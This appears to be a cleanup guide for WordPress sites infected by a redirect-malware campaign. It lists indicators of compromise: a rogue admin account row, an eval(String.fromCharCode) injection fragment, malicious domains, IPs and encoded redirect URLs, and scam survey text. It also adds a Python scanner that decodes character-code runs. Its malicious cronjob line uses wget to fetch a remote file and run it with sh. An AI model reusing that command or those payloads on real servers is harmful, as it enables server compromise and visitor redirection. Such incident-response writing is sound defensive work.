How to Remove cdn.weatherplllatform.com Malware

If your website is currently affected by cdn.weatherplllatform.com, some of its local files are most likely infected.
Today, after cleaning a website affected by this exact type of malware, I found out the following:

Quick steps:

  • Disable public access on the server & check other neighbor sites;
  • Perform a backup for each website;
  • Clean the sites manually, one by one, or purchase a cleanup plan;
  • If your hosting account holds more than 2 sites, consider better hosting to prevent cross-site contamination;
  • Apply updates & make sure all the site components are up to date & secure; and
  • Monitor the sites to notice any unusual behavior.

1. Malicious users with administrator privileges;

itsme','$P$BqPKFgMTAdxmIvuLuC8iBtt2okVOLY/','itsme','[email protected]','','2020-04-21 06:42:46','',0,'itsme

2. Infected Javascript files;

eval(String.fromCharCode(118,97,....,32,125/*spectrepoint*/));

3. PHP files with injected malicious code;

?php $PDvCBkdAp='y(3;]whcx)8$4mb dk1qog5sprlua

4. Malicious cronjobs added via cPanel interface, xxxd file execution;

wget -q -O xxxd http://hello.hellodolly777.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/.../public_html 24 && rm -f xxxd

5. Backdoor files installed in random locations.

if (isset($_HEADERS['Authorization']))

Malicious URLs:

Malicious files injected or added: index.php, wp-story.php, wp-static.php.

Malicious domains: 0.blueskymotions.net, 0.blueskymotions.com, greenskymotions.net, pertiolanrokemi.tk, 0.trackspecialsdomain.com, 0.trackspecialdomain.com, simple.cofounderspecials.com, scripts.cofounderspecials.com, weatherplllatform.com, bettershitecolumn.com, goldflowerservice.net, cawanmyoropurka.gq (Cloudflare), bluewellabs.live, broworker4s.com.

Malicious IPs: 95.216.10.178, 45.9.148.27, 194.135.30.42, 141.95.174.47, 91.211.91.114, 185.177.94.108, 91.211.91.104, 89.22.228.250.

Cloudflare nameservers:
olivia.ns.cloudflare.com
rayden.ns.cloudflare.com

String.fromCharCode:
104,116,116,112,115,58,47,47,110,101,119,115,46,119,101,97,116,104,101,114,112,108,108,108,97,116,102,111,114,109,46,99,111,109,47,99,111,117,110,116,101,114,115,46,106,115,63,118,61,49,49,46,50,51
104,116,116,112,115,58,47,47,99,100,110,46,119,101,97,116,104,101,114,112,108,108,108,97,116,102,111,114,109,46,99,111,109,47,101,118,101,110,116,115,46,106,115,63,118,61,48,46,49,56,56
104, 116, 116, 112, 115, 58, 47, 47, 97, 119, 97, 121, 46, 98, 101, 116, 116, 101, 114, 115, 104, 105, 116, 101, 99, 111, 108, 117, 109, 110, 46, 99, 111, 109, 47, 115, 112, 101, 97, 107, 46, 112, 104, 112, 63, 113, 61, 49, 51, 49, 49, 38, 119, 61, 51, 51, 52, 45, 49, 49, 54, 54, 45, 53, 54, 55, 51, 51, 52, 45, 52, 54
104,116,116,112,115,58,47,47,99,100,110,46,119,101,97,116,104,101,114,112,108,108,108,97,116,102,111,114,109,46,99,111,109,47,114,101,115,117,108,116,46,106,115,63,118,61,48,48,48
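The number lists above are character codes, so a cleanup scan can decode them and compare the result against the malicious domains listed in this guide. The following is an added example, not code from the original guide: the function names and sample strings are constructed for illustration, and the domain subset is copied from the "Malicious domains" line.

```python
import re
from pathlib import Path

# Subset of the "Malicious domains" list in this guide; extend as needed.
BAD_DOMAINS = ("weatherplllatform.com", "bettershitecolumn.com")

# Marker comments such as /*spectrepoint*/ can sit inside the number list.
JS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# At least 8 decimal values (1-3 digits) separated by commas and whitespace.
CODE_RUN = re.compile(r"(?<![\d.])\d{1,3}(?:\s*,\s*\d{1,3}){7,}(?!\d)")


def decode_runs(text):
    """Return the strings hidden in character-code lists found in text."""
    decoded = []
    for run in CODE_RUN.findall(JS_COMMENT.sub("", text)):
        codes = [int(n) for n in re.split(r"\s*,\s*", run)]
        if all(c < 256 for c in codes):
            decoded.append("".join(map(chr, codes)))
    return decoded


def find_hits(text):
    """Decoded strings that mention one of the known-bad domains."""
    return [s for s in decode_runs(text) if any(d in s for d in BAD_DOMAINS)]


def scan_tree(root, suffixes=(".js", ".php", ".html")):
    """Map each matching file under root to the bad strings decoded from it."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            hits = find_hits(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


def encode(s):
    """Helper used only to build the constructed samples below."""
    return ",".join(str(ord(c)) for c in s)


# Constructed samples: one injected line with a marker comment, one benign.
INFECTED = ("eval(String.fromCharCode("
            + encode("https://sub.weatherplllatform.com/sample.js")
            + "/*spectrepoint*/));")
BENIGN = "var s = String.fromCharCode(" + encode("hello, world") + ");"

if __name__ == "__main__":
    print(find_hits(INFECTED), find_hits(BENIGN))
```

Run `scan_tree()` against a backup copy of the web root; any file it reports still needs manual review before the injected line is removed.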

More:

Sample message delivered after the visitors are redirected:
“Today, 26 September 2022, you have been randomly selected to take this survey. It will only take a minute and you will receive an amazing prize: Apple iPhone 13 Pro!”
“Like every Monday, we offer amazing prizes to 10 users. Today’s prize is an Apple iPhone 13 Pro! Only 10 lucky users living in United States will be the winners!
This survey is conducted to improve the services provided to our users, and your participation will be 100% rewarded!
Hurry up, the prizes are limited!”

Previous cleanup guide:
https://guides.magefix.com/2022/09/away-bettershitecolumn-com/